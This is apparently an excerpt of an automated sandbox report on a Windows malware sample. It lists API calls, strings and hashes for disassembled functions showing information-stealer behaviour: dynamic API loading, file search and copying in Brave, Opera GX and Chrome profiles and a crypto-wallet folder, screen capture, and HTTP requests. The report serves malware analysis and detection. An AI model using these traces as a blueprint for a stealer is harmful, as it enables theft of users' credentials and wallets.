lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040212A
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402131
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402138
VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 0040214D
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 00402158
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 0040215F
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 00402166
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 0040216D
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 00402174

Strings

In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention , xrefs: 0040200F, 00402016, 0040201D, 00402024, 0040202B, 0040204A, 00402054, 0040205B, 00402062, 00402069, 00402070, 0040207B, 00402082, 00402089, 00402090, 004020A6, 004020AD, 004020B4, 004020BB, 004020C2, 004020E0, 004020F2, 004020F9, 00402100, 00402107, 00402117, 0040211E, 00402125, 0040212C, 00402133, 00402153, 0040215A, 00402161, 00402168, 0040216F

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtual
String ID: In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention
API String ID: 2533436356-3600131318
Opcode ID: a4167687b35c2fc6c3f12c85d54bc1d37fc4993539ebfefbbc702df93726a96d
Instruction ID: 155b361810c2162a8ce7a193311da36ac5826eab53bfc95ccb16ddaea6ec9530
Opcode Fuzzy Hash: a4167687b35c2fc6c3f12c85d54bc1d37fc4993539ebfefbbc702df93726a96d
Instruction Fuzzy Hash: C131BA21F8033CF79660EBED6C4AF5E6EF5FF8CB50BA0425779085558289A85401CEAF

Function 004176E0 Relevance: 61.5, APIs: 32, Strings: 3, Instructions: 222
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,00E4A9F0), ref: 00417748
GetProcAddress.KERNEL32(74DD0000,00E4A8E8), ref: 00417761
GetProcAddress.KERNEL32(74DD0000,00E4A8A0), ref: 00417779
GetProcAddress.KERNEL32(74DD0000,00E4AAE0), ref: 00417791
GetProcAddress.KERNEL32(74DD0000,00E4EF98), ref: 004177AA
GetProcAddress.KERNEL32(74DD0000,00E56190), ref: 004177C2
GetProcAddress.KERNEL32(74DD0000,00E563B0), ref: 004177DA
GetProcAddress.KERNEL32(74DD0000,00E4AA68), ref: 004177F3
GetProcAddress.KERNEL32(74DD0000,00E4AAB0), ref: 0041780B
GetProcAddress.KERNEL32(74DD0000,00E4A918), ref: 00417823
GetProcAddress.KERNEL32(74DD0000,00E4A930), ref: 0041783C
GetProcAddress.KERNEL32(74DD0000,00E561F0), ref: 00417854
GetProcAddress.KERNEL32(74DD0000,00E4A948), ref: 0041786C
GetProcAddress.KERNEL32(74DD0000,00E4AA08), ref: 00417885
GetProcAddress.KERNEL32(74DD0000,00E56390), ref: 0041789D
GetProcAddress.KERNEL32(74DD0000,00E4AA80), ref: 004178B5
GetProcAddress.KERNEL32(74DD0000,00E4AA98), ref: 004178CE
GetProcAddress.KERNEL32(74DD0000,00E56130), ref: 004178E6
GetProcAddress.KERNEL32(74DD0000,00E4A960), ref: 004178FE
GetProcAddress.KERNEL32(74DD0000,00E561B0), ref: 00417917
LoadLibraryA.KERNEL32(00E4A978), ref: 00417928
LoadLibraryA.KERNEL32(00E4A990), ref: 0041793A
LoadLibraryA.KERNEL32(00E4AC30), ref: 0041794C
LoadLibraryA.KERNEL32(00E4ABA0), ref: 0041795D
LoadLibraryA.KERNEL32(00E4AC00), ref: 0041796F
GetProcAddress.KERNEL32(75A70000,00E4AB88), ref: 0041798B
GetProcAddress.KERNEL32(75290000,00E4ABB8), ref: 004179A7
GetProcAddress.KERNEL32(75290000,00E4AC18), ref: 004179BF
GetProcAddress.KERNEL32(75BD0000,00E4ABD0), ref: 004179DB
GetProcAddress.KERNEL32(75450000,00E564B0), ref: 004179F7
GetProcAddress.KERNEL32(76E90000,00E4EF48), ref: 00417A13
GetProcAddress.KERNEL32(76E90000,00E50D20), ref: 00417A2B

Strings

0a, xrefs: 004178DF
H, xrefs: 00417A0B
, xrefs: 00417A19

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: $0a$H
API String ID: 2238633743-2881926336
Opcode ID: b04e20b63fdf4f387884290b9549695a90ee90dedd28098ad983ad3a78714f51
Instruction ID: 2148604ec22d5dc409469944cda03c78a345716d380cb9a295fa5105f019d802
Opcode Fuzzy Hash: b04e20b63fdf4f387884290b9549695a90ee90dedd28098ad983ad3a78714f51
Instruction Fuzzy Hash: 7CA162B5A116009FD714DFA5EE899263BFBF7C8701308751AEA06C3364E7B8A805CF95

Function 00414F80 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 325
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00414FA0
FindFirstFileA.KERNEL32(?,?), ref: 00414FB7
memset.MSVCRT ref: 00414FD0
memset.MSVCRT ref: 00414FE3
StrCmpCA.SHLWAPI(?,004201DC), ref: 0041500F
StrCmpCA.SHLWAPI(?,004201D8), ref: 00415029
wsprintfA.USER32 ref: 0041504E
StrCmpCA.SHLWAPI(?,004201E9), ref: 00415060
wsprintfA.USER32 ref: 00415088

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

wsprintfA.USER32 ref: 004150AA
memset.MSVCRT ref: 004150C1
lstrcatA.KERNEL32(?,?), ref: 004150D1
strtok_s.MSVCRT ref: 004150E7
strtok_s.MSVCRT ref: 00415116
memset.MSVCRT ref: 00415130
lstrcatA.KERNEL32(?,?), ref: 00415140
strtok_s.MSVCRT ref: 00415156
PathMatchSpecA.SHLWAPI(?,00000000), ref: 0041516E
DeleteFileA.KERNEL32(00000000,00000000,?,00E593C8,?,?,?,004201E0,?,00000000,?,004201E9), ref: 0041520F
CopyFileA.KERNEL32(?,00000000,00000001), ref: 00415227

Part of subcall function 00410F90: CreateFileA.KERNEL32(;RA,80000000,00000003,00000000,00000003,00000080,00000000,?,0041523B,00000000,?,004201E9), ref: 00410FAD
Part of subcall function 00410F90: GetFileSizeEx.KERNEL32(00000000,?,?,004201E9), ref: 00410FBF
Part of subcall function 00410F90: CloseHandle.KERNEL32(00000000,?,004201E9), ref: 00410FCA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00415247
DeleteFileA.KERNEL32(00000000,00000000,?,000003E8,00000000,?,?,004201E9), ref: 00415259
strtok_s.MSVCRT ref: 00415272
FindNextFileA.KERNELBASE(?,?), ref: 00415374
FindClose.KERNEL32(?), ref: 00415386

Strings

%s\%s\%s, xrefs: 00415082
%s\*.*, xrefs: 00414F9A
%s\%s, xrefs: 00415048, 004150A4

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$memsetstrtok_swsprintf$Find$CloseDeletelstrcat$CopyCreateFirstHandleMatchNextPathSizeSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrcpy
String ID: %s\%s$%s\%s\%s$%s\*.*
API String ID: 3252185717-1853381274
Opcode ID: 0aeac19fcec0b14e9ead343c32786da9af42c10a528b2d87a31145e6b81b9723
Instruction ID: 996867c3883e5c4f9d14c97c6daec3073e0067922b1a953186596bd2cd2b31e7
Opcode Fuzzy Hash: 0aeac19fcec0b14e9ead343c32786da9af42c10a528b2d87a31145e6b81b9723
Instruction Fuzzy Hash: 21C19B72900208ABDB24EBB1DC45FEE737CAF44704F54456EF915A6181EF78AB48CBA4

Function 0040C2E0 Relevance: 44.5, APIs: 20, Strings: 5, Instructions: 767
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

FindFirstFileA.KERNEL32(00000000,?,004201E9,004201E9,00000000,?,?,?,004234C0,004201E9,?,00000000,?), ref: 0040C35C
StrCmpCA.SHLWAPI(?,004201DC), ref: 0040C38C
StrCmpCA.SHLWAPI(?,004201D8), ref: 0040C3A6

Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2

StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,004201E0,?,?,004201E9), ref: 0040C43F
StrCmpCA.SHLWAPI(00000000,Brave,00000000,?,004201E0,?,00E59CB8,?,004201E0,?,00E59D78,00000000,?,?,?,004201E0), ref: 0040C5D6
StrCmpCA.SHLWAPI(?,Preferences), ref: 0040C5F0
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6B4
DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004201E9), ref: 0040C77B
StrCmpCA.SHLWAPI(?,00E59398), ref: 0040C7AF

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 0040BF30: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040BFD7
Part of subcall function 0040BF30: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C00B

Part of subcall function 0040C2E0: StrCmpCA.SHLWAPI(?,00E59D78), ref: 0040C813
Part of subcall function 0040C2E0: StrCmpCA.SHLWAPI(00000000,00E59CB8), ref: 0040C82D

FindNextFileA.KERNEL32(?,?), ref: 0040CD02
FindClose.KERNEL32(?), ref: 0040CD14

Strings

Brave, xrefs: 0040C5C5
\BraveWallet\Preferences, xrefs: 0040C6CD
Preferences, xrefs: 0040C5E4
Opera GX, xrefs: 0040C42E
Google Chrome, xrefs: 0040CA6F

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$CopyFind$lstrcatlstrlen$CloseDeleteFirstNext
String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 480569104-1189830961
Opcode ID: d821d812c35f36bcbe5139c83a9a230454e89acdc6cc87c29005b792bb6e50ae
Instruction ID: cbba04a03a0008995a9987146006101dde6cfe135f2cf04865d7d56680781c26
Opcode Fuzzy Hash: d821d812c35f36bcbe5139c83a9a230454e89acdc6cc87c29005b792bb6e50ae
Instruction Fuzzy Hash: 8B522D72910108ABCB24FB71DC56EEE7379AB54304F40857EF906B25D1EF386A4CCAA5

Function 6C5635A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C5EF688,00001000), ref: 6C5635D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5635E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C5635FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C56363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C56369F
__aulldiv.LIBCMT ref: 6C5636E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C563773
EnterCriticalSection.KERNEL32(6C5EF688), ref: 6C56377E
LeaveCriticalSection.KERNEL32(6C5EF688), ref: 6C5637BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C5637C4
EnterCriticalSection.KERNEL32(6C5EF688), ref: 6C5637CB
LeaveCriticalSection.KERNEL32(6C5EF688), ref: 6C563801
__aulldiv.LIBCMT ref: 6C563883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C563902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C563918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C56394C

Strings

AuthcAMDenti, xrefs: 6C563946
MOZ_TIMESTAMP_MODE, xrefs: 6C5635DB
QPC, xrefs: 6C5638FC
GTC, xrefs: 6C563912
GenuntelineI, xrefs: 6C563639

Memory Dump Source

Source File: 00000001.00000002.2458707840.000000006C561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C560000, based on PE: true

Associated: 00000001.00000002.2458628586.000000006C560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2459852233.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2460006367.000000006C5EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2460057313.000000006C5F2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c560000_MSBuild.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 51f26ec6d8110b69a95cc948828a8662ef418edf171e465009b1aedade76fc92
Instruction ID: 0c7caf911d8f142f4d7d8f97e1338ebd902a57981a2e469cd841cf4ed2ca025d
Opcode Fuzzy Hash: 51f26ec6d8110b69a95cc948828a8662ef418edf171e465009b1aedade76fc92
Instruction Fuzzy Hash: 0FB1C6B1B093109FDB48DF29DC4461ABBF5BB8E704F068A2DE499D7760DB709900CB89

Function 00415EA0 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 227stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00415EBC
FindFirstFileA.KERNEL32(?,?), ref: 00415ED3
StrCmpCA.SHLWAPI(?,004201DC), ref: 00415EFC
StrCmpCA.SHLWAPI(?,004201D8), ref: 00415F16
wsprintfA.USER32 ref: 00415F3B
StrCmpCA.SHLWAPI(?,004201E9), ref: 00415F4A
wsprintfA.USER32 ref: 00415F67
wsprintfA.USER32 ref: 00415F86
PathMatchSpecA.SHLWAPI(?,?), ref: 00415F97
lstrcatA.KERNEL32(?,00E59F38,?,000003E8), ref: 00415FC3
lstrcatA.KERNEL32(?,004201E0), ref: 00415FD5
lstrcatA.KERNEL32(?,?), ref: 00415FE3
lstrcatA.KERNEL32(?,004201E0), ref: 00415FF5
lstrcatA.KERNEL32(?,?), ref: 00416009
CopyFileA.KERNEL32(?,00000000,00000001), ref: 004160AA
DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004201E9), ref: 00416119

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399

FindNextFileA.KERNEL32(?,?), ref: 00416160
FindClose.KERNEL32(?), ref: 00416172

Strings

%s\*, xrefs: 00415EB6
%s\%s, xrefs: 00415F35, 00415F80

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$CloseCopyCreateDeleteFirstMatchNextObjectPathSingleSleepSpecThreadWaitlstrcpy
String ID: %s\%s$%s\*
API String ID: 103870964-2848263008
Opcode ID: 17b6025013d19771342505bce037e7501b215a9a2c06ee1d8103fd0691f27d35
Instruction ID: 4f3ba6799c96e4c8b2fdef7625ad27d3c1a7b3744a2bb23c5cf2dc8a64d10888
Opcode Fuzzy Hash: 17b6025013d19771342505bce037e7501b215a9a2c06ee1d8103fd0691f27d35
Instruction Fuzzy Hash: AA818472A10218ABCB24FBB1DC45DEE777DBF44304F44557AF506A2091EF38AA48CBA5

Function 00411530 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 174windowCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0041159C
GetWindowRect.USER32(00000000,?), ref: 004115A9
GetDC.USER32(00000000), ref: 004115B0
CreateCompatibleDC.GDI32(00000000), ref: 004115B9
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004115CA
SelectObject.GDI32(00000000,00000000), ref: 004115D5
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 004115F5
GlobalFix.KERNEL32(00000043), ref: 0041165B
GlobalSize.KERNEL32(00000043), ref: 00411668

Strings

image/jpeg, xrefs: 00411617
poAC, xrefs: 00411579, 00411705, 00411687, 0041168C
poAC, xrefs: 004115FE, 00411630, 004116D1, 00411601, 0041163A, 004116D4

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CompatibleCreateGlobalWindow$BitmapDesktopObjectRectSelectSize
String ID: image/jpeg$poAC$poAC
API String ID: 536084594-2740837080
Opcode ID: 3fe6dabcc2c81dd9f3a611074f51b2e4a6b2e6bb1b1143ce74ac243d99af8bbc
Instruction ID: defcd3f450e1372c84fb34f4d7ba74a0fd3369ce25f5533fa2b14cfeea203380
Opcode Fuzzy Hash: 3fe6dabcc2c81dd9f3a611074f51b2e4a6b2e6bb1b1143ce74ac243d99af8bbc
Instruction Fuzzy Hash: 275133B6900208AFDB14EFB5DC49EEE77BDEF88711F005529FA01E2290DB3499448BA4

Function 00405010 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 174networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405062
StrCmpCA.SHLWAPI(?,00E59ED8,?,?,?,?,?,?,?), ref: 0040507A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004050A2
HttpOpenRequestA.WININET(00000000,GET,?,00E5ADC8,00000000,00000000,-00400100,00000000), ref: 004050DC
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405100
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040510F
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040512E
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405177
InternetReadFile.WININET(00000000,00000000,000007CF,?), ref: 004051C5
InternetCloseHandle.WININET(00000000), ref: 004051D0
InternetCloseHandle.WININET(?), ref: 004051DA
InternetCloseHandle.WININET(00000000), ref: 004051E4

Strings

ERROR, xrefs: 0040513B
GET, xrefs: 004050D6

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
